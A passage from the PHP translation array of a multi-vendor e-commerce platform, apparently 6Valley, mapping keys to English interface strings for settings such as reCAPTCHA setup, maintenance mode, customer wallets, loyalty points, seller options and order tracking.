Customer', 'add_New_Method' => 'Add New Method', 'Want_to_delete_this_item' => 'Want to delete this item', 'limited_Stock' => 'Limited Stock', 'featured_Products' => 'Featured Products', 'find_your_best_signature_product' => 'Find your best signature product', 'other_stores' => 'Other stores', 'secured_information' => 'Secured information', 'cannot_Use_0_only' => 'Cannot Use 0 only', 'N/a' => 'N/a', 'subscribe_our_newsletter_to_get_latest_updates' => 'Subscribe our newsletter to get latest updates', 'enter_captcha_value' => 'Enter captcha value', 'reCaptcha_Setup' => 'ReCaptcha Setup', 'credentials_SetUp_page' => 'Credentials SetUp page', 'turn_OFF' => 'Turn OFF', 'site_Key' => 'Site Key', 'to_get_site_key_and_secret_key_Go_to_the_Credentials_page' => 'To get site key and secret key Go to the Credentials page', 'add_a_abel_(Ex:_abc_company)' => 'Add a abel (Ex: abc company)', 'select_reCAPTCHA_v2_as_ReCAPTCHA_Type' => 'Select reCAPTCHA v2 as ReCAPTCHA Type', 'im_not_a_robot_checkbox' => 'Im not a robot checkbox', 'add_Domain_(For_ex:_demo.6amtech.com)' => 'Add Domain (For ex: demo.6amtech.com)', 'check_in_“Accept_the_reCAPTCHA_Terms_of_Service”' => 'Check in “Accept the reCAPTCHA Terms of Service”', 'press_Submit' => 'Press Submit', 'copy_Site_Key_and_Secret_Key _Paste_in_the_input_filed_below_and_Save.' => 'Copy Site Key and Secret Key Paste in the input filed below and Save.', 'Updated_Successfully' => 'Updated Successfully', 'cookies' => 'Cookies', 'OTP_&_Login' => 'OTP & Login', 'login_Url_Setup' => 'Login Url Setup', 'system_Addons' => 'System Addons', 'app_name' => 'App name', 'app_debug' => 'App debug', 'app_mode' => 'App mode', 'app_url' => 'App url', 'DB_connection' => 'DB connection', 'DB_host' => 'DB host', 'DB_port' => 'DB port', 'DB_database' => 'DB database', 'DB_username' => 'DB username', 'DB_password' => 'DB password', 'buyer_username' => 'Buyer username', '6valley-admin-demo-jhisdfhisufjifjfijqw5467' => '6valley-admin-demo-jhisdfhisufjifjfijqw5467', 545464646 => '545464646', 'get_your_zip_file_from_the_purchased_addons_and_upload_it_and_activate_theme_with_your_Codecanyon_username_and_purchase_code' => 'Get your zip file from the purchased addons and upload it and activate theme with your Codecanyon username and purchase code', 'now_you’ll_be_successfully_able_to_use_the_addons_for_your_6Valley_website' => 'Now you’ll be successfully able to use the addons for your 6Valley website', 'upload_Addons' => 'Upload Addons', 'file_upload_successfully!' => 'File upload successfully!', 'are_you_sure_you_want_to_delete_the_addon' => 'Are you sure you want to delete the addon', 'you_will_lost_the_this_addon' => 'You will lost the this addon', 'do_you_want_to_change_in_addon_status' => 'Do you want to change in addon status', 'if_you_change_addon_status' => 'If you change addon status', 'some_features_will_changed' => 'Some features will changed', 'file_delete_successfully' => 'File delete successfully', 'addon_menus' => 'Addon menus', 'payment_setup' => 'Payment setup', 'sms_setup' => 'Sms setup', 'pay_your_bill_using_any_of_the_payment_method_below_and_input_the_required_information_in_the_form' => 'Pay your bill using any of the payment method below and input the required information in the form', 'select_Payment_Method' => 'Select Payment Method', 'select_a_payment_method first' => 'Select a payment method first', 'sms_gateways_configuration' => 'Sms gateways configuration', 'Payment Setup' => 'Payment Setup', 'payment_gateway_configuration' => 'Payment gateway configuration', 'payment_gateway_title' => 'Payment gateway title', 'ReCAPTCHA_Failed' => 'ReCAPTCHA Failed', 'mail_template' => 'Mail template', 'Seller_registration' => 'Seller registration', 'read_instructions' => 'Read instructions', 'shipping_method_for_In-house_deliver' => 'Shipping method for In-house deliver', 'Category_cost_successfully_updated' => 'Category cost successfully updated', 'order_Delivery_Verification' => 'Order Delivery Verification', 'Refund_Order_Validity' => 'Refund Order Validity', 'free_Delivery_Over' => 'Free Delivery Over', 'expense_Transactions' => 'Expense Transactions', 'wallet_bonus' => 'Wallet bonus', 'in_House Orders' => 'In House Orders', 'seller_Orders' => 'Seller Orders', 'in_House Products' => 'In House Products', 'total_Transactions' => 'Total Transactions', 'search_by_orders_id' => 'Search by orders id', 'download_PDF' => 'Download PDF', 'start Date' => 'Start Date', 'end Date' => 'End Date', 'total_Expense' => 'Total Expense', 'free_Delivery_Coupon' => 'Free Delivery Coupon', 'search_by_Order_ID_or_Transaction_ID' => 'Search by Order ID or Transaction ID', 'transaction_Date' => 'Transaction Date', 'expense_Amount' => 'Expense Amount', 'expense_Type' => 'Expense Type', 'business_model' => 'Business model', 'responsibility' => 'Responsibility', 'free_delivery_over_amount' => 'Free delivery over amount', 'invalid_user' => 'Invalid user', 'shop_details' => 'Shop details', 'edit_shop' => 'Edit shop', 'visit_website' => 'Visit website', 'shop_settings' => 'Shop settings', 'Ex: 10' => 'Ex: 10', 'save_informtion' => 'Save informtion', 'seller_Information' => 'Seller Information', 'seller_setup' => 'Seller setup', 'default_commission' => 'Default commission', 'default_commission (%)' => 'Default commission (%)', 'ex: 70' => 'Ex: 70', 'enable_POS_in_Seller_Panel' => 'Enable POS in Seller Panel', 'seller_can_set_own_shop_order_limit_individually' => 'Seller can set own shop order limit individually', 'need_product_approval' => 'Need product approval', 'if_the_shipping_responsibility_is_inhouse_and_product_wise_shipping_is_activated_then_this_function_will_work' => 'If the shipping responsibility is inhouse and product wise shipping is activated then this function will work', 'wallet_Bonus_Setup' => 'Wallet Bonus Setup', 'please_click_save_information_button_below_to_save_all_the_changes' => 'Please click save information button below to save all the changes', 'Want_to_enable_the_Maintenance_Mode' => 'Want to enable the Maintenance Mode', 'Want_to_disable_the_Maintenance_Mode' => 'Want to disable the Maintenance Mode', 'if_enabled_all_your_apps_and_customer_website_will_be_temporarily_off' => 'If enabled all your apps and customer website will be temporarily off', 'if_disabled_all_your_apps_and_customer_website_will_be_functional' => 'If disabled all your apps and customer website will be functional', 'by_turning_the' => 'By turning the', 'Maintenance_Mode' => 'Maintenance Mode', 'ON' => 'ON', 'all_your_apps_and_customer_website_will_be_disabled_until_you_turn_this_mode_OFF' => 'All your apps and customer website will be disabled until you turn this mode OFF', 'only_the_Admin_Panel_&_Seller_Panel_will_be_functional' => 'Only the Admin Panel & Seller Panel will be functional', 'click_on_the_map_to_see_your_location_latitude' => 'Click on the map to see your location latitude', 'click_on_the_map_to_see_your_location_longitude' => 'Click on the map to see your location longitude', 'set_how_users_of_recover_their_forgotten_password' => 'Set how users of recover their forgotten password', 'if_enabled_users_can_receive_verification_codes_on_their_registered_email_addresses' => 'If enabled users can receive verification codes on their registered email addresses', 'want_to_Turn_OFF_the_Email_Verification' => 'Want to Turn OFF the Email Verification', 'want_to_Turn_ON_the_Email_Verification' => 'Want to Turn ON the Email Verification', 'if_disabled_users_would_not_receive_verification_codes_on_their_registered_email_addresses' => 'If disabled users would not receive verification codes on their registered email addresses', 'if_enabled_users_will_receive_verification_codes_on_their_registered_email_addresses' => 'If enabled users will receive verification codes on their registered email addresses', 'if_enabled_users_can_receive_verification_codes_via_OTP_messages_on_their_registered_phone_numbers' => 'If enabled users can receive verification codes via OTP messages on their registered phone numbers', 'want_to_Turn_OFF_the_OTP_Verification' => 'Want to Turn OFF the OTP Verification', 'want_to_Turn_ON_the_OTP_Verification' => 'Want to Turn ON the OTP Verification', 'if_disabled_users_would_not_receive_verification_codes_on_their_registered_phone_numbers' => 'If disabled users would not receive verification codes on their registered phone numbers', 'if_enabled_users_will_receive_verification_codes_on_their_registered_phone_numbers' => 'If enabled users will receive verification codes on their registered phone numbers', 'if_enabled_users_can_complete_the_checkout_process_without_logging_in_to_the_system' => 'If enabled users can complete the checkout process without logging in to the system', 'want_to_Turn_OFF_the_Guest_Checkout_Mode' => 'Want to Turn OFF the Guest Checkout Mode', 'want_to_Turn_ON_the_Guest_Checkout_Mode' => 'Want to Turn ON the Guest Checkout Mode', 'if_disabled_users_must_log_in_to_the_system_to_complete_the_checkout_process' => 'If disabled users must log in to the system to complete the checkout process', 'this_number_indicates_how_much_data_will_be_shown_in_the_list_or_table' => 'This number indicates how much data will be shown in the list or table', 'if_enabled_the_download_button_from_the_App_Store_will_be_visible_in_the_Footer_section' => 'If enabled the download button from the App Store will be visible in the Footer section', 'want_to_Turn_OFF_the_App_Store_button' => 'Want to Turn OFF the App Store button', 'want_to_Turn_ON_the_App_Store_button' => 'Want to Turn ON the App Store button', 'if_disabled_the_App_Store_button_will_be_hidden_from_the_website_footer' => 'If disabled the App Store button will be hidden from the website footer', 'if_enabled_everyone_can_see_the_App_Store_button_in_the_website_footer' => 'If enabled everyone can see the App Store button in the website footer', 'if_enabled_the_Google_Play_Store_will_be_visible_in_the_website_footer_section' => 'If enabled the Google Play Store will be visible in the website footer section', 'want_to_Turn_OFF_the_Google_Play_Store_button' => 'Want to Turn OFF the Google Play Store button', 'want_to_Turn_ON_the_Google_Play_Store_button' => 'Want to Turn ON the Google Play Store button', 'if_disabled_the_Google_Play_Store_button_will_be_hidden_from_the_website_footer' => 'If disabled the Google Play Store button will be hidden from the website footer', 'if_enabled_everyone_can_see_the_Google_Play_Store_button_in_the_website_footer' => 'If enabled everyone can see the Google Play Store button in the website footer', '* multiple_zip_codes_can_be_inputted_by_comma_separating_or_pressing_enter_button' => '* multiple zip codes can be inputted by comma separating or pressing enter button', 'delivery_country_deleted_successfully' => 'Delivery country deleted successfully', 'delivery_country_added_successfully' => 'Delivery country added successfully', 'delivery_zip_code_deleted_successfully' => 'Delivery zip code deleted successfully', 'expand_cart' => 'Expand cart', 'My_Shopping_Cart' => 'My Shopping Cart', 'genuine_product' => 'Genuine product', 'please_click_the_Save_button_below_to_save_all_the_changes' => 'Please click the Save button below to save all the changes', 'customers_receive_a_verification_code_after_placing_an_order' => 'Customers receive a verification code after placing an order', 'when_a_deliveryman_arrives_for_delivery_they_must_provide_the_code_to_the_deliveryman_to_verify_the_order_delivery' => 'When a deliveryman arrives for delivery they must provide the code to the deliveryman to verify the order delivery', 'want_to_Turn_ON_Order_Delivery_Verification' => 'Want to Turn ON Order Delivery Verification', 'want_to_Turn_OFF_Order_Delivery_Verification' => 'Want to Turn OFF Order Delivery Verification', 'if_enabled_deliverymen_must_verify_the_order_deliveries_by_collecting_the_OTP_from_customers' => 'If enabled deliverymen must verify the order deliveries by collecting the OTP from customers', 'if_disabled_deliverymen_do_not_need_to_verify_the_order_deliveries' => 'If disabled deliverymen do not need to verify the order deliveries', 'if_enabled_customers_must_place_at_least_or_more_than_the_order_amount_that_admin_or_sellers_set' => 'If enabled customers must place at least or more than the order amount that admin or sellers set', 'want_to_Turn_ON_Minimum_Order_Amount' => 'Want to Turn ON Minimum Order Amount', 'want_to_Turn_OFF_Minimum_Order_Amount' => 'Want to Turn OFF Minimum Order Amount', 'if_enabled_customers_must_order_over_the_minimum_amount_of_orders_that_admin_or_sellers_set' => 'If enabled customers must order over the minimum amount of orders that admin or sellers set', 'if_disabled_there_will_be_no_minimum_order_restrictions_and_customers_can_place_any_order_amount' => 'If disabled there will be no minimum order restrictions and customers can place any order amount', 'if_enabled_the_billing_address_will_be_shown_on_the_checkout_page' => 'If enabled the billing address will be shown on the checkout page', 'want_to_Turn_ON_Billing_Address_in_Checkout' => 'Want to Turn ON Billing Address in Checkout', 'want_to_Turn_OFF_Billing_Address_in_Checkout' => 'Want to Turn OFF Billing Address in Checkout', 'if_disabled_the_billing_address_will_be_hidden_from_the_checkout_page' => 'If disabled the billing address will be hidden from the checkout page', 'if_enabled_free_delivery_will_be_available_when_customers_order_over_a_certain_amount' => 'If enabled free delivery will be available when customers order over a certain amount', 'want_to_Turn_ON_Free_Delivery' => 'Want to Turn ON Free Delivery', 'want_to_Turn_OFF_Free_Delivery' => 'Want to Turn OFF Free Delivery', 'if_enabled_the_free_delivery_feature_will_be_shown_from_the_system' => 'If enabled the free delivery feature will be shown from the system', 'if_disabled_the_free_delivery_feature_will_be_hidden_from_the_system' => 'If disabled the free delivery feature will be hidden from the system', 'by_Turning_ON_Guest_Checkout_Mode' => 'By Turning ON Guest Checkout Mode', 'by_Turning_Off_Guest_Checkout_Mode' => 'By Turning Off Guest Checkout Mode', 'user_can_place_order_without_login' => 'User can place order without login', 'user_cannot_place_order_without_login' => 'User cannot place order without login', 'invalid_access' => 'Invalid access', 'shipping_Address' => 'Shipping Address', 'and_billing' => 'And billing', 'another_address' => 'Another address', 'address_type' => 'Address type', 'choose_Payment_Method' => 'Choose Payment Method', 'back_to_shipping' => 'Back to shipping', 'redirecting_to_the_payment' => 'Redirecting to the payment', 'order_Complete' => 'Order Complete', 'john_doe' => 'John doe', 'dhaka' => 'Dhaka', 'street_1 _street_2 _street_3 _street_4' => 'Street 1 street 2 street 3 street 4', 'your_order_has_been_placed_successfully' => 'Your order has been placed successfully', 'you_order_has_been_confirmed_and_will_be_shipped_according_to_the_method_you_selected' => 'You order has been confirmed and will be shipped according to the method you selected', 'order_No' => 'Order No', 'my_Order' => 'My Order', 'estimated_Delivary_Date' => 'Estimated Delivary Date', 'packaging_order' => 'Packaging order', 'preparing_Shipment' => 'Preparing Shipment', 'order_Shipped' => 'Order Shipped', 'view_Order_Details' => 'View Order Details', 'track_Order_Result' => 'Track Order Result', 'Invalid Phone Number' => 'Invalid Phone Number', 'Enter_your_order_ID_&_phone_to_get_delivery_updates' => 'Enter your order ID & phone to get delivery updates', 'no_review' => 'No review', 'limited_stock' => 'Limited stock', 'check_All_Wishlist' => 'Check All Wishlist', 'product_refund_validity' => 'Product refund validity', 'days_after_delivery' => 'Days after delivery', 'Order_cancelation_availablity' => 'Order cancelation availablity', 'before_the_seller_confirms_the_order' => 'Before the seller confirms the order', 'shopping_details' => 'Shopping details', 'check_All_CartList' => 'Check All CartList', 'same_as_delivery_address' => 'Same as delivery address', 'no_address_is_saved' => 'No address is saved', 'update_this_address' => 'Update this address', 'please_contact_with_deliveryman_to_confirm_your_pay_and_receive_your_order.' => 'Please contact with deliveryman to confirm your pay and receive your order.', 'Pro Plus 32 Inch Android Smart Wifi Hd Led Tv 4k Supported' => 'Pro Plus 32 Inch Android Smart Wifi Hd Led Tv 4k Supported', 'not_reviewed_yet' => 'Not reviewed yet', 'sorry_no_review_found_to_show_you' => 'Sorry no review found to show you', 'your_order_placed_successfully' => 'Your order placed successfully', 'delete_profile' => 'Delete profile', 'enter_your_order_ID_& _phone_to_get_delivery_updates' => 'Enter your order ID & phone to get delivery updates', 'track_order_result' => 'Track order result', 'check_My_All_Orders' => 'Check My All Orders', 'tracking_status' => 'Tracking status', 'order_is_on_the_way' => 'Order is on the way', 'order_delivered' => 'Order delivered', 'order_created_at' => 'Order created at', 'guest_customer' => 'Guest customer', 'no_billing_address_found' => 'No billing address found', 'order_Invoice' => 'Order Invoice', 'shop_Name' => 'Shop Name', 'if_you_require_any_assistance_or_have_feedback_or_suggestions_about_our_site_you_can_email_us_at' => 'If you require any assistance or have feedback or suggestions about our site you can email us at', 'pending_Refund_Requests' => 'Pending Refund Requests', 'search_by_order_id_or_refund_id' => 'Search by order id or refund id', 'want_to_delete_this_customer' => 'Want to delete this customer', 'customer_Details' => 'Customer Details', 'customer_ID' => 'Customer ID', 'joined_At' => 'Joined At', 'ssl_commerz' => 'Ssl commerz', 'review_List' => 'Review List', 'search_by_Product_or_Customer' => 'Search by Product or Customer', 'choose_product' => 'Choose product', 'choose_customer' => 'Choose customer', 'from_date' => 'From date', 'to_date' => 'To date', 'no_comment_found' => 'No comment found', 'add_Fund' => 'Add Fund', 'filter_options' => 'Filter options', 'select_transaction_type' => 'Select transaction type', 'add_fund_by_customer' => 'Add fund by customer', 'refund_order' => 'Refund order', 'summary' => 'Summary', 'order_refund' => 'Order refund', 'you_want_to_add_fund' => 'You want to add fund', 'to_wallet' => 'To wallet', 'fund_added_successfully' => 'Fund added successfully', 'customer_wallet_bonus_setup' => 'Customer wallet bonus setup', 'how_it_works' => 'How it works', 'wallet_bonus_is_only_applicable_when_a_customer_add_fund_to_wallet_via_outside_payment_gateway' => 'Wallet bonus is only applicable when a customer add fund to wallet via outside payment gateway', 'customer_will_get_extra_amount_to_his_or_her_wallet_additionally_with_the_amount_he_or_she_added_from_other_payment_gateways' => 'Customer will get extra amount to his or her wallet additionally with the amount he or she added from other payment gateways', 'the_bonus_amount_will_be_deduct_from_admin_wallet_&_will_consider_as_admin_expense' => 'The bonus amount will be deduct from admin wallet & will consider as admin expense', 'bonus_title' => 'Bonus title', 'Ex: EID_Dhamaka' => 'Ex: EID Dhamaka', 'short_description' => 'Short description', 'bonus_type' => 'Bonus type', 'persentage (%)' => 'Persentage (%)', 'fixed_amount' => 'Fixed amount', 'minimum_add_amount' => 'Minimum add amount', '$' => '$', 'bonus_amount' => 'Bonus amount', 'Ex: 5' => 'Ex: 5', 'maximum_bonus' => 'Maximum bonus', 'wallet_Bonus_Table' => 'Wallet Bonus Table', 'search_by_ID_or_name' => 'Search by ID or name', 'bonus_info' => 'Bonus info', 'started_on' => 'Started on', 'expires_on' => 'Expires on', 'customer_loyalty_point_report' => 'Customer loyalty point report', 'point_to_wallet' => 'Point to wallet', 'shop_overview' => 'Shop overview', 'transaction' => 'Transaction', 'suspend_this_seller' => 'Suspend this seller', 'A/C_No' => 'A/C No', 'aready_Withdrawn' => 'Aready Withdrawn', 'order_Table' => 'Order Table', 'print_invoice' => 'Print invoice', 'payment_Reference' => 'Payment Reference', 'order_is_already_delivered_and_transaction_amount_has_been_disbursed_changing_status_can_be_the_reason_of_miscalculation' => 'Order is already delivered and transaction amount has been disbursed changing status can be the reason of miscalculation', 'think_before_you_proceed' => 'Think before you proceed', 'order_is_already_delivered.' => 'Order is already delivered.', 'you_can_not_change_it' => 'You can not change it', 'search_by_email' => 'Search by email', 'add_new_delivery_man' => 'Add new delivery man', 'general_Information' => 'General Information', 'first_Name' => 'First Name', 'last_Name' => 'Last Name', 'identity_Type' => 'Identity Type', 'driving_License' => 'Driving License', 'company_ID' => 'Company ID', 'identity_Number' => 'Identity Number', 'deliveryman_image' => 'Deliveryman image', 'account_Information' => 'Account Information', 'total_Seller' => 'Total Seller', 'total_Seller_Products' => 'Total Seller Products', 'denied' => 'Denied', 'pending_Request' => 'Pending Request', 'average_Earning_Value' => 'Average Earning Value', 'seller_Wallet_Status' => 'Seller Wallet Status', 'wallet_Amount' => 'Wallet Amount', 'withdrawble_Balance' => 'Withdrawble Balance', 'pending_Withdraws' => 'Pending Withdraws', 'earn_From_Order' => 'Earn From Order', 'commission_Given' => 'Commission Given', 'tax_Collected' => 'Tax Collected', 'inhouse_product_sale Report' => 'Inhouse product sale Report', 'seller_product_sale_Report' => 'Seller product sale Report', 'seller_Reports' => 'Seller Reports', 'total_Deliveryman' => 'Total Deliveryman', 'total_Shop_Earnings' => 'Total Shop Earnings', 'seller-Info' => 'Seller-Info', 'refund_Rate' => 'Refund Rate', 'seller_Details' => 'Seller Details', 'back_to_seller_list' => 'Back to seller list', 'order_info' => 'Order info', 'search_by_orders_id_or_transaction_id' => 'Search by orders id or transaction id', 'in-House' => 'In-House', 'offline_Payments' => 'Offline Payments', 'ssl commerz' => 'Ssl commerz', 'active_Products' => 'Active Products', 'inactive_Products' => 'Inactive Products', 'pending_Products' => 'Pending Products', 'search_by_orders_id_or_transaction_ID' => 'Search by orders id or transaction ID', 'oder_Transaction_Statement' => 'Oder Transaction Statement', 'completed_Orders' => 'Completed Orders', 'ongoing_Orders' => 'Ongoing Orders', 'canceled_Orders' => 'Canceled Orders', 'total_Ordered_Product_Price' => 'Total Ordered Product Price', 'total_Product_Discount' => 'Total Product Discount', 'total_Coupon_Discount' => 'Total Coupon Discount', 'total_Discounted_Amount' => 'Total Discounted Amount', 'total_Delivery_Charge' => 'Total Delivery Charge', 'admin_Discount' => 'Admin Discount', 'seller_Discount' => 'Seller Discount', 'admin_Commission' => 'Admin Commission', 'seller_Net_Income' => 'Seller Net Income', 'withdraw_Request_Table' => 'Withdraw Request Table', 'once_deleted_you_will_not_be_able_to_recover_this' => 'Once deleted you will not be able to recover this', 'bank_Info_View' => 'Bank Info View', 'bank_Information' => 'Bank Information', 'holder_Name' => 'Holder Name', 'branch_Name' => 'Branch Name', 'account_Number' => 'Account Number', 'about_Our_Company' => 'About Our Company', 'root' => 'Root', 'read_Before_Change_Theme' => 'Read Before Change Theme', 'if_you_change_from_on_theme_to_another_there_are_certain_changes_that_you_need_to_maintain_and_setup_data.' => 'If you change from on theme to another there are certain changes that you need to maintain and setup data.', 'all_the_promotional_banners_from_the_website_and_user_app_will_be_clear_once_the_theme_is_changed.' => 'All the promotional banners from the website and user app will be clear once the theme is changed.', 'you_have_to_input_all_the_banners_again_for_each_section' => 'You have to input all the banners again for each section', 'there_may_be_some_features_that_are_not_available_in_other_themes.' => 'There may be some features that are not available in other themes.', 'in_these_cases_you_have_to_setup_data_for_those_features_after_changing_the_theme.' => 'In these cases you have to setup data for those features after changing the theme.', 'after_changing_any_theme_in_the_you_will_a_menu_option_with_the_menu_name.' => 'After changing any theme in the you will a menu option with the menu name.', 'Under_this_menu_you_can_setup_all_the_new_features_option_that_are_only_available_for_that_specific_theme.' => 'Under this menu you can setup all the new features option that are only available for that specific theme.', 'you_setup_those_data_from_there.' => 'You setup those data from there.', 'after_switching_the_theme_a_menu_will_appear_in_the_side_bar_with_the_theme_name_on_it' => 'After switching the theme a menu will appear in the side bar with the theme name on it', 'you_can_setup_theme_wise_required_data_from_there.' => 'You can setup theme wise required data from there.', 'you_have_switched_theme_successfully' => 'You have switched theme successfully', 'please_be_reminded_that_you_have_to_setup_data_for_these_section_for_aster_theme.' => 'Please be reminded that you have to setup data for these section for aster theme.', 'other_wise_these_section_data_would_not_function_properly_in_website_and_user_apps' => 'Other wise these section data would not function properly in website and user apps', 'Promotional_Banners' => 'Promotional Banners', 'In-House_Store_Banner' => 'In-House Store Banner', 'please_do_not_forget_to_notify_your_sellers_about_these_changes.' => 'Please do not forget to notify your sellers about these changes.', 'so_that_they_can_also_update_their_store_banners_according_to_the_new_theme_ratio' => 'So that they can also update their store banners according to the new theme ratio', 'notify_All_the_Sellers' => 'Notify All the Sellers', 'skip' => 'Skip', 'Menu' => 'Menu', 'Most_Demanded_Product' => 'Most Demanded Product', 'no_shipping_address_found' => 'No shipping address found', 'most_demanded_table' => 'Most demanded table', 'search_by_product_name' => 'Search by product name', '24 Inch Hd LED Television - Black 24 Inch' => '24 Inch Hd LED Television - Black 24 Inch', 'are_you_sure_delete_this_most_demanded_product' => 'Are you sure delete this most demanded product', 'most-demanded_product_deleted_successfully' => 'Most-demanded product deleted successfully', 'edit_most_demanded' => 'Edit most demanded', 'most_demanded_product_update_successfully' => 'Most demanded product update successfully', 'get_in' => 'Get in', 'find_us' => 'Find us', 'type_your_message_here' => 'Type your message here', 'delivery_Man' => 'Delivery Man', 'customer_Wallet' => 'Customer Wallet', 'admin_can_set_whether_wallet_will_be_available_on_customer_profile_by_enabling_or_disabling_this_button' => 'Admin can set whether wallet will be available on customer profile by enabling or disabling this button', 'want_to_Turn_ON_Customer_Wallet' => 'Want to Turn ON Customer Wallet', 'want_to_Turn_OFF_Customer_Wallet' => 'Want to Turn OFF Customer Wallet', 'if_enabled_customers_can_have_the_wallet_option_on_their_account_and_use_it_while_placing_orders_and_getting_refunds' => 'If enabled customers can have the wallet option on their account and use it while placing orders and getting refunds', 'if_disabled_customer_wallet_option_will_be_hidden_from_their_account' => 'If disabled customer wallet option will be hidden from their account', 'customer_Loyalty_Point' => 'Customer Loyalty Point', 'admin_can_set_whether_customers_will_get_loyalty_points_by_enabling_or_disabling_this_button' => 'Admin can set whether customers will get loyalty points by enabling or disabling this button', 'want_to_Turn_ON_Loyalty_Point' => 'Want to Turn ON Loyalty Point', 'want_to_Turn_OFF_Loyalty_Point' => 'Want to Turn OFF Loyalty Point', 'if_enabled_the_loyalty_point_option_will_be_available_to_the_customers_account' => 'If enabled the loyalty point option will be available to the customers account', 'if_disabled_loyalty_point_option_will_be_hidden_from_the_customers_account' => 'If disabled loyalty point option will be hidden from the customers account', 'customer_Referrer_Earning' => 'Customer Referrer Earning', 'admin_can_set_whether_customers_will_get_referral_earnings_by_enabling_or_disabling_this_button' => 'Admin can set whether customers will get referral earnings by enabling or disabling this button', 'want_to_Turn_ON_Referral_And_Earning_option' => 'Want to Turn ON Referral And Earning option', 'want_to_Turn_OFF_Referral_And_Earning_option' => 'Want to Turn OFF Referral And Earning option', 'if_enabled_customers_will_receive_rewards_for_each_successful_referral' => 'If enabled customers will receive rewards for each successful referral', 'if_disabled_customers_will_not_receive_rewards_for_successful_referral' => 'If disabled customers will not receive rewards for successful referral', 'customer_Wallet_Settings' => 'Customer Wallet Settings', 'if_the_Customer_Wallet_option_is_disabled_above_all_settings_of_this_section_will_be_unavailable' => 'If the Customer Wallet option is disabled above all settings of this section will be unavailable', 'add_Refund_Amount_to_Wallet' => 'Add Refund Amount to Wallet', 'admin_can_set_whether_customers_will_get_refund_amount_to_wallet_by_enabling_or_disabling_this_button' => 'Admin can set whether customers will get refund amount to wallet by enabling or disabling this button', 'want_to_Turn_ON_Refund_to_Wallet_option' => 'Want to Turn ON Refund to Wallet option', 'want_to_Turn_OFF_Refund_to_Wallet_option' => 'Want to Turn OFF Refund to Wallet option', 'if_enabled_Admin_can_return_the_refund_amount_directly_to_the_customers_wallet_' => 'If enabled Admin can return the refund amount directly to the customers wallet ', 'if_disabled_Admin_needs_to_return_the_refund_amount_manually' => 'If disabled Admin needs to return the refund amount manually', 'add_Fund_to_Wallet' => 'Add Fund to Wallet', 'admin_can_set_whether_customers_can_add_money_to_their_wallets_by_enabling_or_disabling_this_button' => 'Admin can set whether customers can add money to their wallets by enabling or disabling this button', 'want_to_Turn_ON_Add_Fund_to_Wallet_option' => 'Want to Turn ON Add Fund to Wallet option', 'want_to_Turn_OFF_Add_Fund_to_Wallet_option' => 'Want to Turn OFF Add Fund to Wallet option', 'if_enabled_customers_can_add_money_to_their_wallet' => 'If enabled customers can add money to their wallet', 'if_disabled_customers_would_not_be_able_to_add_money_to_their_wallet' => 'If disabled customers would not be able to add money to their wallet', 'minimum_Add_Fund_Amount' => 'Minimum Add Fund Amount', 'maximum_Add_Fund_Amount' => 'Maximum Add Fund Amount', 'customer_Loyalty_Point_Settings' => 'Customer Loyalty Point Settings', 'if_the_Customer_Loyalty_Point_option_is_disabled_above_all_settings_of_this_section_will_be_unavailable' => 'If the Customer Loyalty Point option is disabled above all settings of this section will be unavailable', 'equivalent_Point_to_1_Unit_Currency' => 'Equivalent Point to 1 Unit Currency', 'loyalty_Point_Earn_on_Each_Order' => 'Loyalty Point Earn on Each Order', '%' => '%', 'minimum_Point_Required_To_Convert' => 'Minimum Point Required To Convert', 'when_converting_loyalty_points_to_currency_customers_will_require_the_minimum_loyalty_point_set_by_the_admin' => 'When converting loyalty points to currency customers will require the minimum loyalty point set by the admin', 'customer_Referrer_Settings' => 'Customer Referrer Settings', 'earnings_to_Each_Referral' => 'Earnings to Each Referral', 'free_Delivery_Responsibility' => 'Free Delivery Responsibility', 'want_to_Turn_OFF_the_Temporary_Close_option' => 'Want to Turn OFF the Temporary Close option', 'want_to_Turn_ON_the_Temporary_Close_option' => 'Want to Turn ON the Temporary Close option', 'if_disabled_this_feature_will_be_hidden_from_the_system' => 'If disabled this feature will be hidden from the system', 'if_enabled_admin_can_temporarily_pause_his_shop_activities' => 'If enabled admin can temporarily pause his shop activities', 'by_turning_on_the' => 'By turning on the', 'temporary_Close' => 'Temporary Close', 'button_admin_can_pause_his_shop_activities_and_his_shop_will_be_shown_as' => 'Button admin can pause his shop activities and his shop will be shown as', 'in_the_system' => 'In the system', 'Customers_will_not_be_able_to_order_or_purchase_from_his_shop' => 'Customers will not be able to order or purchase from his shop', 'set_the_minimum_order_amount_a_customer_must_order_from_the_inhouse_shop' => 'Set the minimum order amount a customer must order from the inhouse shop', 'free_Delivery_Over_Amount' => 'Free Delivery Over Amount', 'set_the_default_commission_amount_that_will_be_received_from_sellers_on_each_order' => 'Set the default commission amount that will be received from sellers on each order', 'if_enabled_POS_will_be_available_on_the_Seller_Panel' => 'If enabled POS will be available on the Seller Panel', 'want_to_Turn_ON_POS_for_Seller' => 'Want to Turn ON POS for Seller', 'want_to_Turn_OFF_POS_for_Seller' => 'Want to Turn OFF POS for Seller', 'if_enabled_POS_option_will_be_available_in_the_Seller_Panel' => 'If enabled POS option will be available in the Seller Panel', 'if_disabled_POS_option_will_be_hidden_from_the_Seller_Panel' => 'If disabled POS option will be hidden from the Seller Panel', 'if_enabled_sellers_can_send_registration_requests_to_admin' => 'If enabled sellers can send registration requests to admin', 'want_to_Turn_ON_Self_Registration' => 'Want to Turn ON Self Registration', 'want_to_Turn_OFF_Self_Registration' => 'Want to Turn OFF Self Registration', 'if_enabled_sellers_can_register_by_themselves_from_website_or_app' => 'If enabled sellers can register by themselves from website or app', 'admin_can_review_the_registration_request_and_approve_or_deny_the_request' => 'Admin can review the registration request and approve or deny the request', 'if_disabled_Sellers_can_not_register_themselves_from_website_or_App' => 'If disabled Sellers can not register themselves from website or App', 'only_Admin_can_create_an_account_for_any_seller' => 'Only Admin can create an account for any seller', 'if_enabled_sellers_can_set_minimum_order_amount_for_their_stores_by_themselves' => 'If enabled sellers can set minimum order amount for their stores by themselves', 'want_to_Turn_ON_the_Set_Minimum_Order_Amount_option' => 'Want to Turn ON the Set Minimum Order Amount option', 'want_to_Turn_OFF_the_Set_Minimum_Order_Amount_option' => 'Want to Turn OFF the Set Minimum Order Amount option', 'if_disabled_sellers_cannot_set_the_minimum_order_amount_for_their_store_and_the_admin_will_set_it' => 'If disabled sellers cannot set the minimum order amount for their store and the admin will set it', 'set_whether_sellers_need_admin_approval_before_adding_new_products_to_their_shops' => 'Set whether sellers need admin approval before adding new products to their shops', 'successfully_uploaded' => 'Successfully uploaded', 'attribute_Setup' => 'Attribute Setup', 'add_new_attribute' => 'Add new attribute', 'attribute_Name' => 